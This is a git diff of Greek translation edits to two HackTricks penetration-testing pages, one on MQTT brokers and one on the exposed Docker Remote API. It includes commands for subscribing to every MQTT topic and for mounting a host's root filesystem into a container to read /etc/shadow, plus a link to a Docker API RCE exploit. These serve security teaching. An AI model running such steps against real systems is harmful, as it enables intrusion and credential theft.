Το **MQ Telemetry Transport (MQTT)** είναι γνωστό ως ένα πρωτόκολλο μηνυμάτων **δημοσίευσης/συνδρομής** που ξεχωρίζει για την ακραία απλότητα και ελαφρότητά του. Αυτό το πρωτόκολλο είναι σχεδιασμένο ειδικά για περιβάλλοντα όπου οι συσκευές έχουν περιορισμένες δυνατότητες και λειτουργούν σε δίκτυα που χαρακτηρίζονται από χαμηλό εύρος ζώνης, υψηλή καθυστέρηση ή αναξιόπιστες συνδέσεις. Οι βασικοί στόχοι του MQTT περιλαμβάνουν την ελαχιστοποίηση της χρήσης της δικτυακής ζώνης και τη μείωση της ζήτησης στους πόρους της συσκευής. Επιπλέον, στοχεύει στη διατήρηση αξιόπιστης επικοινωνίας και στην παροχή ενός συγκεκριμένου επιπέδου διασφάλισης παράδοσης. Αυτοί οι στόχοι καθιστούν το MQTT εξαιρετικά κατάλληλο για τον αναπτυσσόμενο τομέα της **επικοινωνίας μηχανής προς μηχανή (M2M)** και του **Διαδικτύου των Πραγμάτων (IoT)**, όπου είναι ουσιώδες να συνδέονται αποτελεσματικά μια πληθώρα συσκευών. Επιπλέον, το MQTT είναι υψίστης ωφέλειας για κινητές εφαρμογές, όπου η διατήρηση της ζώνης ζώνης και της διάρκειας ζωής της μπαταρίας είναι κρίσιμη.
|
||||
|
||||
**Προεπιλεγμένη θύρα:** 1883
|
||||
```
|
||||
|
@ -52,11 +52,11 @@ PORT STATE SERVICE REASON
|
|||
|
||||
### [**Χαμηλής Πιθανότητας Επίθεση Brute-Force στο MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
|
||||
|
||||
## Ελεγχος Εισβολής στο MQTT
|
||||
## Ελεγχος Ασφάλειας MQTT
|
||||
|
||||
**Η ταυτοποίηση είναι εντελώς προαιρετική** και ακόμα και αν γίνεται ταυτοποίηση, **η κρυπτογράφηση δεν χρησιμοποιείται από προεπιλογή** (οι διαπιστεύσεις στέλνονται σε καθαρό κείμενο). Οι επιθέσεις MITM μπορούν ακόμα να εκτελεστούν για να κλέψουν κωδικούς πρόσβασης.
|
||||
**Η ταυτοποίηση είναι εντελώς προαιρετική** και ακόμα κι αν γίνεται ταυτοποίηση, **η κρυπτογράφηση δεν χρησιμοποιείται από προεπιλογή** (οι διαπιστεύσεις στέλνονται σε καθαρό κείμενο). Οι επιθέσεις MITM μπορούν ακόμα να εκτελεστούν για την κλοπή κωδικών πρόσβασης.
|
||||
|
||||
Για να συνδεθείτε σε έναν υπηρεσία MQTT μπορείτε να χρησιμοποιήσετε: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) και να εγγραφείτε σε όλα τα θέματα κάνοντας:
|
||||
Για να συνδεθείτε σε έναν MQTT υπηρεσία, μπορείτε να χρησιμοποιήσετε: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) και να εγγραφείτε σε όλα τα θέματα κάνοντας:
|
||||
```
|
||||
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
|
||||
> subscribe "#" 1
|
||||
|
@ -105,10 +105,10 @@ main()
|
|||
|
||||
Το μοντέλο δημοσίευσης/εγγραφής αποτελείται από:
|
||||
|
||||
* **Εκδότης**: δημοσιεύει ένα μήνυμα σε ένα (ή πολλαπλά) θέμα(τα) στο μεσίτη.
|
||||
* **Συνδρομητής**: εγγράφεται σε ένα (ή πολλαπλά) θέμα(τα) στο μεσίτη και λαμβάνει όλα τα μηνύματα που στέλνει ο εκδότης.
|
||||
* **Μεσίτης**: δρομολογεί όλα τα μηνύματα από τους εκδότες στους συνδρομητές.
|
||||
* **Θέμα**: αποτελείται από έναν ή περισσότερους επίπεδους που διαχωρίζονται με μια κάθετο (π.χ., /smartshouse/livingroom/temperature).
|
||||
- **Εκδότης**: δημοσιεύει ένα μήνυμα σε ένα (ή πολλαπλά) θέμα(τα) στο μεσίτη.
|
||||
- **Συνδρομητής**: εγγράφεται σε ένα (ή πολλαπλά) θέμα(τα) στο μεσίτη και λαμβάνει όλα τα μηνύματα που στέλνονται από τον εκδότη.
|
||||
- **Μεσίτης**: δρομολογεί όλα τα μηνύματα από τους εκδότες στους συνδρομητές.
|
||||
- **Θέμα**: αποτελείται από έναν ή περισσότερους επίπεδους που διαχωρίζονται με μια κάθετο (π.χ., /smartshouse/livingroom/temperature).
|
||||
|
||||
### Μορφή Πακέτου <a href="#f15a" id="f15a"></a>
|
||||
|
||||
|
@ -118,35 +118,35 @@ main()
|
|||
|
||||
### Τύποι Πακέτων
|
||||
|
||||
* CONNECT (1): Εκκινείται από τον πελάτη για να ζητήσει σύνδεση με τον εξυπηρετητή.
|
||||
* CONNACK (2): Η αναγνώριση του εξυπηρετητή για μια επιτυχημένη σύνδεση.
|
||||
* PUBLISH (3): Χρησιμοποιείται για να στείλει ένα μήνυμα από τον πελάτη στον εξυπηρετητή ή αντίστροφα.
|
||||
* PUBACK (4): Αναγνώριση ενός πακέτου PUBLISH.
|
||||
* PUBREC (5): Μέρος ενός πρωτοκόλλου παράδοσης μηνύματος που εξασφαλίζει τη λήψη του μηνύματος.
|
||||
* PUBREL (6): Επιπλέον εγγύηση στην παράδοση μηνύματος, υποδεικνύοντας απελευθέρωση μηνύματος.
|
||||
* PUBCOMP (7): Τελικό μέρος του πρωτοκόλλου παράδοσης μηνύματος, υποδεικνύοντας ολοκλήρωση.
|
||||
* SUBSCRIBE (8): Αίτημα του πελάτη για να ακούσει μηνύματα από ένα θέμα.
|
||||
* SUBACK (9): Η αναγνώριση του εξυπηρετητή για ένα αίτημα SUBSCRIBE.
|
||||
* UNSUBSCRIBE (10): Αίτημα του πελάτη για να σταματήσει να λαμβάνει μηνύματα από ένα θέμα.
|
||||
* UNSUBACK (11): Η απάντηση του εξυπηρετητή σε ένα αίτημα UNSUBSCRIBE.
|
||||
* PINGREQ (12): Ένα μήνυμα καρδιάς που στέλνεται από τον πελάτη.
|
||||
* PINGRESP (13): Η απάντηση του εξυπηρετητή στο μήνυμα καρδιάς.
|
||||
* DISCONNECT (14): Εκκινείται από τον πελάτη για να τερματίσει τη σύνδεση.
|
||||
* Δύο τιμές, 0 και 15, έχουν επισημανθεί ως δεσμευμένες και η χρήση τους είναι απαγορευμένη.
|
||||
- CONNECT (1): Εκκινείται από τον πελάτη για να ζητήσει σύνδεση με τον εξυπηρετητή.
|
||||
- CONNACK (2): Η αναγνώριση του εξυπηρετητή για μια επιτυχημένη σύνδεση.
|
||||
- PUBLISH (3): Χρησιμοποιείται για να στείλει ένα μήνυμα από τον πελάτη στον εξυπηρετητή ή αντίστροφα.
|
||||
- PUBACK (4): Αναγνώριση ενός πακέτου PUBLISH.
|
||||
- PUBREC (5): Μέρος ενός πρωτοκόλλου παράδοσης μηνύματος που εξασφαλίζει τη λήψη του μηνύματος.
|
||||
- PUBREL (6): Επιπλέον εγγύηση στην παράδοση μηνύματος, υποδεικνύοντας απελευθέρωση μηνύματος.
|
||||
- PUBCOMP (7): Τελικό μέρος του πρωτοκόλλου παράδοσης μηνύματος, υποδεικνύοντας ολοκλήρωση.
|
||||
- SUBSCRIBE (8): Αίτημα του πελάτη για να ακούσει μηνύματα από ένα θέμα.
|
||||
- SUBACK (9): Η αναγνώριση του εξυπηρετητή για ένα αίτημα SUBSCRIBE.
|
||||
- UNSUBSCRIBE (10): Αίτημα του πελάτη για να σταματήσει να λαμβάνει μηνύματα από ένα θέμα.
|
||||
- UNSUBACK (11): Η απάντηση του εξυπηρετητή σε ένα αίτημα UNSUBSCRIBE.
|
||||
- PINGREQ (12): Ένα μήνυμα καρδιάς που στέλνεται από τον πελάτη.
|
||||
- PINGRESP (13): Η απάντηση του εξυπηρετητή στο μήνυμα καρδιάς.
|
||||
- DISCONNECT (14): Εκκινείται από τον πελάτη για να τερματίσει τη σύνδεση.
|
||||
- Δύο τιμές, 0 και 15, έχουν επισημανθεί ως δεσμευμένες και η χρήση τους είναι απαγορευμένη.
|
||||
|
||||
## Shodan
|
||||
|
||||
* `port:1883 MQTT`
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των απαγωγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους **δωρεάν** στο:
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -156,10 +156,10 @@ main()
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
- Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
- Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
- Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
- **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
- **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# 2375, 2376 Ελεγχος Ευπαθειών Docker
|
||||
# 2375, 2376 Ελέγχος Ευπάθειας Docker
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -6,7 +6,7 @@
|
|||
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στα HackTricks** ή να **κατεβάσετε τα HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -14,15 +14,15 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -32,15 +32,15 @@
|
|||
|
||||
#### Τι είναι
|
||||
|
||||
Το Docker είναι η **πρωτοπόρος πλατφόρμα** στη βιομηχανία της **εμπορευματοποίησης**, πρωτοστατώντας στη **συνεχή καινοτομία**. Διευκολύνει την απλή δημιουργία και διανομή εφαρμογών, καλύπτοντας από τις **παραδοσιακές έως τις μελλοντικές**, και εξασφαλίζει τη **ασφαλή ανάπτυξή** τους σε διαφορετικά περιβάλλοντα.
|
||||
Το Docker είναι η **πρωτοποριακή πλατφόρμα** στη βιομηχανία της **containerization**, πρωτοστατώντας στη **συνεχή καινοτομία**. Διευκολύνει την απλή δημιουργία και διανομή εφαρμογών, καλύπτοντας από τις **παραδοσιακές έως τις μελλοντικές**, και εξασφαλίζει τη **ασφαλή ανάπτυξή** τους σε διαφορετικά περιβάλλοντα.
|
||||
|
||||
#### Βασική αρχιτεκτονική του Docker
|
||||
|
||||
* [**containerd**](http://containerd.io): Αυτό είναι ένας **πυρήνας εκτέλεσης** για τα containers, υπεύθυνος για την ολοκληρωμένη **διαχείριση του κύκλου ζωής ενός container**. Αυτό περιλαμβάνει τη χειρισμό **μεταφοράς και αποθήκευσης εικόνων**, καθώς και την επίβλεψη της **εκτέλεσης, παρακολούθησης και δικτύωσης** των containers. **Περισσότερες λεπτομέρειες** για το containerd **εξετάζονται περαιτέρω**.
|
||||
* Το **container-shim** διαδραματίζει κρίσιμο ρόλο ως **μεσολαβητής** στη χειρισμό **ανενεργών containers**, παίρνοντας απαλά τη θέση από το **runc** μετά την αρχικοποίηση των containers.
|
||||
* [**runc**](http://runc.io): Εκτιμάται για τις δυνατότητές του ως **ελαφρύς και καθολικός χρόνος εκτέλεσης container**, το runc είναι συμβατός με το **πρότυπο OCI**. Χρησιμοποιείται από το containerd για να **ξεκινήσει και να διαχειριστεί τα containers** σύμφωνα με τις **οδηγίες OCI**, έχοντας εξελιχθεί από το αρχικό **libcontainer**.
|
||||
* [**runc**](http://runc.io): Εκτιμάται για τις δυνατότητές του ως **ελαφρύς και καθολικός χρόνος εκτέλεσης container**, το runc είναι συμβατό με το **OCI πρότυπο**. Χρησιμοποιείται από το containerd για να **ξεκινήσει και να διαχειριστεί τα containers** σύμφωνα με τις **οδηγίες του OCI**, έχοντας εξελιχθεί από το αρχικό **libcontainer**.
|
||||
* [**grpc**](http://www.grpc.io) είναι ουσιώδες για τη **διευκόλυνση της επικοινωνίας** μεταξύ του containerd και της **μηχανής docker**, εξασφαλίζοντας **αποτελεσματική αλληλεπίδραση**.
|
||||
* Το [**OCI**](https://www.opencontainers.org) είναι κρίσιμο για τη διατήρηση των **προδιαγραφών OCI** για το χρόνο εκτέλεσης και τις εικόνες, με τις πιο πρόσφατες εκδόσεις του Docker να είναι **συμμορφωμένες τόσο με τις προδιαγραφές εικόνων όσο και με τον πρότυπο χρόνου εκτέλεσης** του OCI.
|
||||
* Το [**OCI**](https://www.opencontainers.org) είναι κρίσιμο για τη διατήρηση των **προδιαγραφών OCI** για το χρόνο εκτέλεσης και τις εικόνες, με τις πιο πρόσφατες εκδόσεις του Docker να είναι **συμμορφωμένες τόσο με τις προδιαγραφές εικόνων όσο και με τον χρόνο εκτέλεσης** του OCI.
|
||||
|
||||
#### Βασικές εντολές
|
||||
```bash
|
||||
|
@ -67,11 +67,11 @@ docker system prune -a
|
|||
```
|
||||
#### Containerd
|
||||
|
||||
**Containerd** αναπτύχθηκε ειδικά για να εξυπηρετήσει τις ανάγκες πλατφορμών ελαχίστων όπως **Docker και Kubernetes**, μεταξύ άλλων. Στοχεύει στο **απλοποίηση της εκτέλεσης των containers** σε διάφορα λειτουργικά συστήματα, συμπεριλαμβανομένων των Linux, Windows, Solaris, και άλλων, με την αφαίρεση λειτουργιών που εξαρτώνται από το λειτουργικό σύστημα και κλήσεις συστήματος. Ο στόχος του Containerd είναι να περιλαμβάνει μόνο τα απαραίτητα χαρακτηριστικά που απαιτούν οι χρήστες του, προσπαθώντας να παραλείψει περιττά στοιχεία. Ωστόσο, η πλήρης επίτευξη αυτού του στόχου αναγνωρίζεται ως πρόκληση.
|
||||
**Containerd** αναπτύχθηκε ειδικά για να εξυπηρετήσει τις ανάγκες πλατφορμών ελαχίστων όπως **Docker και Kubernetes**, μεταξύ άλλων. Στοχεύει στο **απλοποίηση της εκτέλεσης των containers** σε διάφορα λειτουργικά συστήματα, συμπεριλαμβανομένων των Linux, Windows, Solaris, και άλλων, με την αφαίρεση λειτουργιών που είναι ειδικές στο λειτουργικό σύστημα και κλήσεις συστήματος. Ο στόχος του Containerd είναι να περιλαμβάνει μόνο τα απαραίτητα χαρακτηριστικά που απαιτούν οι χρήστες του, προσπαθώντας να παραλείψει τα περιττά στοιχεία. Ωστόσο, η πλήρης επίτευξη αυτού του στόχου αναγνωρίζεται ως πρόκληση.
|
||||
|
||||
Μια κύρια σχεδιαστική απόφαση είναι ότι το **Containerd δεν διαχειρίζεται το δίκτυο**. Το δίκτυο θεωρείται κρίσιμο στοιχείο σε κατανεμημένα συστήματα, με πολυπλοκότητες όπως το Λογισμικό Ορισμένου Δικτύου (SDN) και η ανακάλυψη υπηρεσιών που ποικίλλουν σημαντικά από μια πλατφόρμα σε μια άλλη. Επομένως, το Containerd αφήνει τις πτυχές του δικτύου να διαχειρίζονται από τις πλατφόρμες που υποστηρίζει.
|
||||
Μια κύρια σχεδιαστική απόφαση είναι ότι το **Containerd δεν διαχειρίζεται το δίκτυο**. Το δίκτυο θεωρείται κρίσιμο στοιχείο σε κατανεμημένα συστήματα, με πολυπλοκότητες όπως το Λογισμικό Ορισμένου Δικτύου (SDN) και την ανακάλυψη υπηρεσιών που ποικίλλουν σημαντικά από μια πλατφόρμα σε μια άλλη. Επομένως, το Containerd αφήνει τις πτυχές του δικτύου να διαχειρίζονται από τις πλατφόρμες που υποστηρίζει.
|
||||
|
||||
Ενώ το **Docker χρησιμοποιεί το Containerd** για την εκτέλεση των containers, είναι σημαντικό να σημειωθεί ότι το Containerd υποστηρίζει μόνο ένα υποσύνολο των λειτουργιών του Docker. Συγκεκριμένα, το Containerd δεν διαθέτει τις δυνατότητες διαχείρισης δικτύου που υπάρχουν στο Docker και δεν υποστηρίζει τη δημιουργία των Docker swarms απευθείας. Αυτή η διάκριση υπογραμμίζει τον εστιασμένο ρόλο του Containerd ως περιβάλλοντος εκτέλεσης container, αναθέτοντας πιο εξειδικευμένες λειτουργίες στις πλατφόρμες με τις οποίες ενσωματώνεται.
|
||||
Ενώ το **Docker χρησιμοποιεί το Containerd** για την εκτέλεση των containers, είναι σημαντικό να σημειωθεί ότι το Containerd υποστηρίζει μόνο ένα υποσύνολο των λειτουργιών του Docker. Συγκεκριμένα, το Containerd δεν διαθέτει τις δυνατότητες διαχείρισης δικτύου που υπάρχουν στο Docker και δεν υποστηρίζει τη δημιουργία των Docker swarms απευθείας. Αυτή η διάκριση υπογραμμίζει τον εστιασμένο ρόλο του Containerd ως περιβάλλοντος εκτέλεσης container, αναθέτοντας τις πιο εξειδικευμένες λειτουργίες στις πλατφόρμες με τις οποίες ενσωματώνεται.
|
||||
```bash
|
||||
#Containerd CLI
|
||||
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
|
||||
|
@ -89,26 +89,28 @@ ctr container delete <containerName>
|
|||
```
|
||||
#### Podman
|
||||
|
||||
**Podman** είναι ένας μηχανισμός ελαχιστοποίησης που τηρεί τα πρότυπα [Open Container Initiative (OCI)](https://github.com/opencontainers), αναπτύχθηκε και διατηρείται από τη Red Hat. Ξεχωρίζει από το Docker με αρκετά χαρακτηριστικά, ειδικά με την **αρχιτεκτονική χωρίς daemon** και την υποστήριξη για **rootless containers**, επιτρέποντας στους χρήστες να εκτελούν containers χωρίς δικαιώματα ρίζας.
|
||||
**Podman** είναι ένας μηχανισμός ελαχιστοποίησης πηγαίου κώδικα που προσαρμόζεται στα πρότυπα του [Open Container Initiative (OCI)](https://github.com/opencontainers), αναπτύχθηκε και διατηρείται από τη Red Hat. Ξεχωρίζει από το Docker με αρκετά χαρακτηριστικά, ειδικά με την **αρχιτεκτονική χωρίς daemon** και την υποστήριξη για **rootless containers**, επιτρέποντας στους χρήστες να εκτελούν containers χωρίς δικαιώματα root.
|
||||
|
||||
Το Podman σχεδιάστηκε για να είναι συμβατό με το API του Docker, επιτρέποντας τη χρήση εντολών του Docker CLI. Αυτή η συμβατότητα επεκτείνεται στο οικοσύστημά του, το οποίο περιλαμβάνει εργαλεία όπως το **Buildah** για τη δημιουργία εικόνων container και το **Skopeo** για λειτουργίες εικόνας όπως push, pull και inspect. Περισσότερες λεπτομέρειες για αυτά τα εργαλεία μπορούν να βρεθούν στη [σελίδα τους στο GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
|
||||
Το Podman σχεδιάστηκε για να είναι συμβατό με το API του Docker, επιτρέποντας τη χρήση εντολών CLI του Docker. Αυτή η συμβατότητα επεκτείνεται στο οικοσύστημά του, το οποίο περιλαμβάνει εργαλεία όπως το **Buildah** για τη δημιουργία εικόνων container και το **Skopeo** για λειτουργίες εικόνας όπως push, pull και inspect. Περισσότερες λεπτομέρειες για αυτά τα εργαλεία μπορούν να βρεθούν στη [σελίδα τους στο GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
|
||||
|
||||
**Κύριες Διαφορές**
|
||||
|
||||
* **Αρχιτεκτονική**: Αντίθετα με το μοντέλο πελάτη-εξυπηρετητή του Docker με έναν δαίμονα παρασκηνίου, το Podman λειτουργεί χωρίς δαίμονα. Αυτός ο σχεδιασμός σημαίνει ότι τα containers τρέχουν με τα δικαιώματα του χρήστη που τα ξεκινά, βελτιώνοντας την ασφάλεια με το να εξαλείφεται η ανάγκη για πρόσβαση ρίζας.
|
||||
* **Ενσωμάτωση systemd**: Το Podman ενσωματώνεται με το **systemd** για τη διαχείριση των containers, επιτρέποντας τη διαχείριση containers μέσω μονάδων systemd. Αυτό αντίθετα με τη χρήση του systemd από το Docker κυρίως για τη διαχείριση της διαδικασίας του Docker daemon.
|
||||
* **Rootless Containers**: Ένα κεντρικό χαρακτηριστικό του Podman είναι η δυνατότητά του να εκτελεί containers με τα δικαιώματα του χρήστη που τα εκκινεί. Αυτή η προσέγγιση ελαχιστοποιεί τους κινδύνους που σχετίζονται με παραβιάσεις container εξασφαλίζοντας ότι οι επιτιθέμενοι κερδίζουν μόνο τα δικαιώματα του χρήστη που έχει παραβιαστεί, όχι πρόσβαση ρίζας.
|
||||
* **Αρχιτεκτονική**: Αντίθετα με το μοντέλο πελάτη-εξυπηρετητή του Docker με έναν δαίμονα παρασκηνίου, το Podman λειτουργεί χωρίς δαίμονα. Αυτός ο σχεδιασμός σημαίνει ότι τα containers τρέχουν με τα προνόμια του χρήστη που τα ξεκινά, βελτιώνοντας την ασφάλεια με το να εξαλείφεται η ανάγκη για πρόσβαση root.
|
||||
* **Ενσωμάτωση systemd**: Το Podman ενσωματώνεται με το **systemd** για τη διαχείριση των containers, επιτρέποντας τη διαχείριση containers μέσω μονάδων systemd. Αυτό αντίθετα με τη χρήση του Docker του systemd κυρίως για τη διαχείριση της διαδικασίας του Docker daemon.
|
||||
* **Rootless Containers**: Ένα καίριο χαρακτηριστικό του Podman είναι η δυνατότητά του να εκτελεί containers με τα προνόμια του χρήστη που τα εκκινεί. Αυτή η προσέγγιση ελαχιστοποιεί τους κινδύνους που σχετίζονται με παραβιάσεις container εξασφαλίζοντας ότι οι επιτιθέμενοι κερδίζουν μόνο τα προνόμια του χρήστη που έχει παραβιαστεί, όχι πρόσβαση root.
|
||||
|
||||
Η προσέγγιση του Podman προσφέρει μια ασφαλή και ευέλικτη εναλλακτική λύση στο Docker, τονίζοντας τη διαχείριση δικαιωμάτων χρήστη και τη συμβατότητα με τις υπάρχουσες ροές εργασίας του Docker.
|
||||
Η προσέγγιση του Podman προσφέρει μια ασφαλή και ευέλικτη εναλλακτική λύση στο Docker, τονίζοντας τη διαχείριση προνομίων χρήστη και τη συμβατότητα με τις υπάρχουσες ροές εργασίας του Docker.
|
||||
```bash
|
||||
podman --version
|
||||
podman info
|
||||
pdoman images ls
|
||||
podman ls
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
### Βασικές Πληροφορίες
|
||||
|
||||
Το Remote API τρέχει εξ' ορισμού στη θύρα 2375 όταν είναι ενεργοποιημένο. Η υπηρεσία από προεπιλογή δεν απαιτεί πιστοποίηση επιτρέποντας σε έναν επιτιθέμενο να ξεκινήσει ένα προνομιούχο docker container. Χρησιμοποιώντας το Remote API, κάποιος μπορεί να συνδέσει τους hosts / (ριζικό κατάλογο) στο container και να διαβάσει/γράψει αρχεία του περιβάλλοντος του host.
|
||||
Η απομακρυσμένη διεπαφή API λειτουργεί εξ' ορισμού στη θύρα 2375 όταν είναι ενεργοποιημένη. Η υπηρεσία από προεπιλογή δεν απαιτεί ταυτοποίηση επιτρέποντας σε έναν επιτιθέμενο να ξεκινήσει ένα προνομιούχο docker container. Χρησιμοποιώντας την Απομακρυσμένη API, κάποιος μπορεί να συνδέσει τους οικοδεσπότες / (κατάλογο ρίζας) στο container και να διαβάσει/εγγράψει αρχεία του περιβάλλοντος του οικοδεσπότη.
|
||||
|
||||
**Προεπιλεγμένη θύρα:** 2375
|
||||
```
|
||||
|
@ -155,7 +157,7 @@ docker-init:
|
|||
Version: 0.18.0
|
||||
GitCommit: fec3683
|
||||
```
|
||||
Εάν μπορείτε **να επικοινωνήσετε με το απομακρυσμένο API του docker με την εντολή `docker`** μπορείτε **να εκτελέσετε** οποιαδήποτε από τις **εντολές του docker** [**που προαναφέρθηκαν προηγουμένως**](2375-pentesting-docker.md#basic-commands) για να αλληλεπιδράσετε με την υπηρεσία.
|
||||
Εάν μπορείτε **να επικοινωνήσετε με το απομακρυσμένο docker API με την εντολή `docker`** μπορείτε **να εκτελέσετε** οποιαδήποτε από τις **εντολές docker** [**που προηγουμένως** σχολιάστηκαν](2375-pentesting-docker.md#basic-commands) για να αλληλεπιδράσετε με την υπηρεσία.
|
||||
|
||||
{% hint style="info" %}
|
||||
Μπορείτε να `εξάγετε το DOCKER_HOST="tcp://localhost:2375"` και **να αποφύγετε** τη χρήση της παραμέτρου `-H` με την εντολή docker
|
||||
|
@ -206,7 +208,7 @@ nmap -sV --script "docker-*" -p <PORT> <IP>
|
|||
```
|
||||
### Θέτοντας σε κίνδυνο
|
||||
|
||||
Στην ακόλουθη σελίδα μπορείτε να βρείτε τρόπους για **δραπέτευση από ένα docker container**:
|
||||
Στην ακόλουθη σελίδα μπορείτε να βρείτε τρόπους για **δραπέτευση από έναν docker container**:
|
||||
|
||||
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
|
||||
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
|
||||
|
@ -219,16 +221,16 @@ cat /mnt/etc/shadow
|
|||
```
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
|
||||
|
||||
### Ανόρθωση προνομίων
|
||||
### Ανόδος Προνομίων
|
||||
|
||||
Αν βρίσκεστε μέσα σε έναν κεντρικό υπολογιστή που χρησιμοποιεί το Docker, μπορείτε [**να διαβάσετε αυτές τις πληροφορίες για να προσπαθήσετε να αναβαθμίσετε τα προνόμια**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
|
||||
### Ανακάλυψη μυστικών σε ενεργά εκτελούμενα Docker containers
|
||||
